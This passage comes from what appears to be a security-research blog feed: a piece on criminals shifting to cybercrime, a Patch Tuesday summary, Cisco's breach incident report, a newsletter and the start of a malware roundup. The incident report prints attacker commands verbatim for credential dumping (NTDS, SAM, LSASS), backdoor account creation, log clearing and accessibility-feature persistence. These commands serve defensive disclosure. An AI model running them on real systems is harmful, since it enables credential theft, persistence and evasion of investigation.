It seems unlikely that we would see this significant dropoff in drug crime, especially as the percentage of people abusing drugs hasn't likewise dropped significantly. It's important to note that shifts in cannabis laws may have affected the number of arrests, but cannabis wasn't fully legalized in New York state until March 2021.

Additionally, initial data indicates that some crimes including murder, assaults, robberies and grand larceny thefts are decreasing. Major cities in the U.S. reported decreases in said crimes between 30% and 42% following the implementation of stay-at-home orders due to COVID-19. Although the problem may have been exacerbated during the pandemic, it's been around a lot longer.

A recent Forbes article notes that this behavior is a trend that started about a decade ago but has since begun to accelerate. Street gangs are moving away from drugs and toward fraud fueled by cybercrime in the U.S. and around the world. These criminals can operate in two different modes: one where they are actively gathering the data which can require specific expertise in technology, hacking, and malware or the data can just be bought. There are numerous forums where enterprising criminals can buy stolen data including names, addresses, social security numbers and other relevant information required to commit fraud and identity theft. Then, the issue is just monetizing it, and business is booming.

The fact that it is typically a smaller monetary crime makes it easier to accomplish. From a criminal's perspective, it's far easier and safer to take a stolen credit card and buy a $500 gift card from a big box store than it is to launder and process $10,000 stolen through similar means. The larger the denomination and the larger the scale, the more likely you are to draw the interest of federal law enforcement, who have far deeper pockets and much more sophisticated capabilities when it comes to prosecuting cybercrime. The pandemic has introduced additional avenues of fraud that criminal gangs have capitalized on, including COVID-19 relief funds and associated unemployment benefits fraud. In addition to the increases in available funds, the application processes were moved online to ensure the health of those involved, a boon for would-be criminals. Combining these with the already ongoing fraud and identity theft crime and the amount of money these groups are obtaining is significant.

Law enforcement challenges lie ahead


This brings us to the organizations tasked with bringing this new wave of cyber criminals to justice: law enforcement. However, since the majority of this crime is small time, the majority of the responsibility is going to fall on local law enforcement instead of state or federal agencies that tend to cover more significant financial crimes. Unfortunately, that benefits the criminals in some ways. Local law enforcement has many challenges they face daily, including drug and violent crime, to which they are highly trained. These types of arrests can be dangerous and require a very specific skill set.

Cybercrime, on the other hand, is a completely different type of problem to deal with. Instead of breaking down doors and dodging gunfire, law enforcement officers are pouring over data from the criminal themselves and the organizations/people they target with their fraud, trying to tie together transactions to build a solid, forensically sound case.

The real challenge lies in how to effectively deal with these two problems that require completely different skills. This is the dilemma that local law enforcement departments face in the coming years. As we are all aware, information security professionals are highly sought after and can demand significant compensation, and training existing law enforcement officers on how to build cases of cybercrime can be challenging.

Law enforcement can take some cues from private industry here. One trend we are increasingly seeing to address the security talent shortage is to look elsewhere in your organization for those with a penchant for security and the investigative drive necessary to succeed. There are ample investigators inside police departments, look for those with skills in online-based investigations and leverage them for cybercrime in the future.

Additionally, looking to the youth in your community could be another powerful resource for building a talent pipeline. Building relationships with existing computer science programs or high schools in the area to identify this talent could be a great resource. We're already seeing this applied around the world. For instance, in the UK, an investment of seven million pounds in a single year helped lead to the creation of cybercrime units in every police force in England and Wales.

There aren't any easy answers here, but likely will require a shift in the way we handle policing in the future. As more criminals begin to hide beyond keyboards and phones, away from the streets, traditional law enforcement is going to have challenges and what may initially appear to be a reduction in certain types of crime may be accompanied by a similar spike in fraud and cybercrime that isn't as easy to quantify. The future of policing is going to require an increased ability to identify and prosecute more high-tech crime, while still maintaining control over potential drug and violence issues in the jurisdiction.

Conclusion


As we've seen repeatedly over the years, we don't typically see new types of crime, just crime taking new forms. The world today is run by technology and it is becoming an ever-increasing part of our lives, as such, criminal activity is bound to increase. Criminals may seem like they are just out to commit crimes, but in reality, most criminals are choosing to live a life of crime to support themselves and their families. They, like anyone else, are familiar with risk assessment and now it may make more sense to commit crime with a keyboard instead of selling drugs as the risks are lower across the board. It's a lot less likely to draw immediate law enforcement response and there typically aren't turf wars in cyberspace and if they are they tend to be less violent. Furthermore. the margins in cybercrime are significant and in the end the goal is to make as much money as quickly as possible: technology is the key to scale and speed.

Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. The time is now to start building the capabilities into police departments to be able to handle the shift that has already been happening for a decade but is poised to explode, as people have been locked away for several years during the pandemic. The question becomes — how did criminals make use of that time?

Microsoft Patch Tuesday for August 2022 — Snort rules and prominent vulnerabilities

9 August 2022 at 20:44



By Jon Munshaw and Vanja Svajcer.

Microsoft released its monthly security update Tuesday, disclosing more than 120 vulnerabilities across its line of products and software, the most in a single Patch Tuesday in four months.  

This batch of updates also includes a fix for a new vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that’s actively being exploited in the wild, according to Microsoft. MSDT was already the target of the so-called “Follina” zero-day vulnerability in June.  

In all, August’s Patch Tuesday includes 15 critical vulnerabilities and a single low- and moderate-severity issue. The remainder is classified as “important.” 

Two of the important vulnerabilities CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it “more likely” to be exploited.

Microsoft Exchange Server contains two critical elevation of privilege vulnerabilities, CVE-2022-21980 and CVE-2022-24477. An attacker could exploit this vulnerability by tricking a target into visiting a malicious, attacker-hosted server or website. In addition to applying the patch released today, potentially affected users should enable Extended Protection on vulnerable versions of the server. 

The Windows Point-to-Point Tunneling Protocol is also vulnerable to three critical vulnerabilities. Two of them, CVE-2022-35744 and CVE-2022-30133, could allow an attacker to execute remote code on an RAS server machine. The other, CVE-2022-35747, could lead to a denial-of-service condition. CVE-2022-35744 has a CVSS severity score of 9.8 out of 10, one of the highest-rated vulnerabilities this month. An attacker could exploit these vulnerabilities by communicating via Port 1723. Affected users can render these issues unexploitable by blocking that port, though it runs the risk of disrupting other legitimate communications. 

Another critical code execution vulnerability, CVE-2022-35804, affects the SMB Client and Server and the way the protocol handles specific requests. An attacker could exploit this on the SMB Client by configuring a malicious SMBv3 server and tricking a user into connecting to it through a phishing link. It could also be exploited in the Server by sending specially crafted packets to the server.  

Microsoft recommended that users block access to Port 445 to protect against the exploitation of CVE-2022-35804. However, only certain versions of Windows 11 are vulnerable to this issue. 

Talos would also like to highlight eight important vulnerabilities that Microsoft considers to be “more likely” to be exploited:  

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 60371 - 60380, 60382 - 60384, 60386 and 60387. There are also Snort 3 rules 300233 - 300239. 

Cisco Talos shares insights related to recent cyber attack on Cisco

10 August 2022 at 19:30

Update History


Date Description of Updates
Aug. 10th 2022 Adding clarifying details on activity involving active directory.
Aug. 10th 2022 Update made to the Cisco Response and Recommendations section related to MFA.

 Executive summary


  • On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. 
  • During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized. 
  • The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user. 
  • CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc. 
  • After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment. 
  • The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful. 
  • We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators. 
  • For further information see the Cisco Response page here.


Initial vector


Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.  

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms. 


Post-compromise TTPs


Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment. 

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment. 

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.  

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q 
They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment. 

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine. 
C:\Windows\system32\net user z Lh199211* /add 
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.  
reg save hklm\system system 
reg save hklm\sam sam 
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS. 
tasklist | findstr lsass 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system. 
wevtutil.exe el 
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker removing the previously created local administrator account.  
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems. 
netsh advfirewall firewall set rule group=remote desktop new enable=Yes
We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn. 
C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:  
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.  

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.  

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes. 

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.



Backdoor analysis


The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts. 

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure: 
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure: 
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.  

The aforementioned HTTP requests are sent using the following user-agent string: 
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:  
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.  

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack. 


Attack attribution


Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations. 

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating  a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more. 

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information. 

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments. 


Cisco response and recommendations


Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.  

  • Win.Exploit.Kolobko-9950675-0  
  • Win.Backdoor.Kolobko-9950676-0 

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information. 

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious. 

For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match  the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment. 

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.  

Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.  

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack. 

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.  


Mitre ATT&CK mapping


All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred. 

Initial Access 


Execution 


Persistence 


Privilege Escalation 


Defense Evasion 


Credential Access 


Lateral Movement 


Discovery 


Command and Control 


Exfiltration 




Indicators of compromise


The following indicators of compromise were observed associated with this attack. 

Hashes (SHA256) 

184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3 
2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03 
542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d 
61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610 
753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647 
8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a 
8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190 
99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f 
bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7 
eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18 

IP Addresses 

104.131.30[.]201 
108.191.224[.]47 
131.150.216[.]118 
134.209.88[.]140 
138.68.227[.]71 
139.177.192[.]145 
139.60.160[.]20 
139.60.161[.]99 
143.198.110[.]248 
143.198.131[.]210 
159.65.246[.]188 
161.35.137[.]163 
162.33.177[.]27 
162.33.178[.]244 
162.33.179[.]17 
165.227.219[.]211 
165.227.23[.]218 
165.232.154[.]73 
166.205.190[.]23 
167.99.160[.]91 
172.56.42[.]39 
172.58.220[.]52 
172.58.239[.]34 
174.205.239[.]164 
176.59.109[.]115 
178.128.171[.]206 
185.220.100[.]244 
185.220.101[.]10 
185.220.101[.]13 
185.220.101[.]15 
185.220.101[.]16 
185.220.101[.]2 
185.220.101[.]20 
185.220.101[.]34 
185.220.101[.]45 
185.220.101[.]6 
185.220.101[.]65 
185.220.101[.]73 
185.220.101[.]79 
185.220.102[.]242 
185.220.102[.]250 
192.241.133[.]130 
194.165.16[.]98 
195.149.87[.]136 
24.6.144[.]43 
45.145.67[.]170 
45.227.255[.]215 
45.32.141[.]138 
45.32.228[.]189 
45.32.228[.]190 
45.55.36[.]143 
45.61.136[.]207 
45.61.136[.]5 
45.61.136[.]83 
46.161.27[.]117 
5.165.200[.]7 
52.154.0[.]241 
64.227.0[.]177 
64.4.238[.]56 
65.188.102[.]43 
66.42.97[.]210 
67.171.114[.]251 
68.183.200[.]63 
68.46.232[.]60 
73.153.192[.]98 
74.119.194[.]203 
74.119.194[.]4 
76.22.236[.]142 
82.116.32[.]77 
87.251.67[.]41 
94.142.241[.]194 
 

Domains 

cisco-help[.]cf 
cisco-helpdesk[.]cf 
ciscovpn1[.]com 
ciscovpn2[.]com 
ciscovpn3[.]com 
devcisco[.]com 
devciscoprograms[.]com 
helpzonecisco[.]com 
kazaboldu[.]net 
mycisco[.]cf 
mycisco[.]gq 
mycisco-helpdesk[.]ml 
primecisco[.]com 
pwresetcisco[.]com  
 

Email Addresses 

costacancordia[@]protonmail[.]com 





Threat Source newsletter (Aug. 11, 2022) — All of the things-as-a-service

11 August 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

Everyone seems to want to create the next “Netflix” of something. Xbox’s Game Pass is the “Netflix of video games.” Rent the Runway is a “Netflix of fashion” where customers subscribe to a rotation of fancy clothes. 

And now threat actors are looking to be the “Netflix of malware.” All categories of malware have some sort of "as-a-service" twist now. Some of the largest ransomware groups in the world operate “as a service,” allowing smaller groups to pay a fee in exchange for using the larger group’s tools.  

Our latest report on information-stealers points out that “infostealers as-a-service" are growing in popularity, and our researchers also discovered a new “C2 as-a-service" platform where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy — relatively speaking — this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like “Night Rider” to the live action of “Shrek: The Musical” and everything in between.  

How much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever they’re in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don’t even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti.  

With everything going “as a service” it means I don’t necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want.  

This is not necessarily as easy as picking a show on Netflix. But it’s not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an “as-a-service" ransomware attack.  

I have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these “as a service” platforms offline. Maybe that just means we need to start working on the “Netflix of cybersecurity tools.” 
  

The one big thing 


Historically, cybercrime was considered white-collar criminal behavior perpetrated by those that were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that anyone with a smartphone and desire can get started in cybercrime. The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more in favor of traditional “hands-on” crime. 

Why do I care? 

Everyone panics when the local news shows a graph with “violent crime” increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, “as a service” malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars.  

So now what? 

Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams like the classic “I’m in the hospital and need money.” 

 

Other news of note


Microsoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it “more likely” to be exploited. MSDT was already the target of the so-called “Follina” zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and memory leak. (Talos blog, Krebs on Security, SecurityWeek

Some of the U.K.’s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country’s National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients’ records, though the incident has been “contained.” (SC Magazine, Bloomberg, The Guardian

An 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court’s reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. (Vice, CNN

Can’t get enough Talos? 


Upcoming events where you can find Talos 


USENIX Security '22 (Aug. 10 - 12, 2022) 
Las Vegas, Nevada 

DEF CON (Aug. 11 - 14, 2022) 
Las Vegas, Nevada 

Virtual 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 8c69830a50fb85d8a794fa46643493b2  
Typical Filename: AAct.exe  
Claimed Product: N/A   
Detection Name: PUA.Win.Dropper.Generic::1201  

MD5: 311d64e4892f75019ee257b8377c723e  
Typical Filename: ultrasurf-21-32.exe  
Claimed Product: N/A    
Detection Name: W32.DFC.MalParent 

Threat Roundup for August 5 to August 12

12 August 2022 at 20:12

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 5 and Aug. 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name Type Description
Win.Dropper.Tofsee-9960568-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Dropper.TrickBot-9960840-0 Dropper Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Zusy-9960880-0 Trojan Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Dropper.DarkComet-9961766-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. This malware can download files from a user's machine, mechanisms for persistence and hiding. It also has the ability to send back usernames and passwords from the infected system.
Win.Ransomware.TeslaCrypt-9960924-0 Ransomware TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the ransomware, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Virus.Xpiro-9960895-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.Emotet-9961142-0 Dropper Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Remcos-9961392-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Ramnit-9961396-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.

Threat Breakdown

Win.Dropper.Tofsee-9960568-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 10 samples
Registry Keys Occurrences
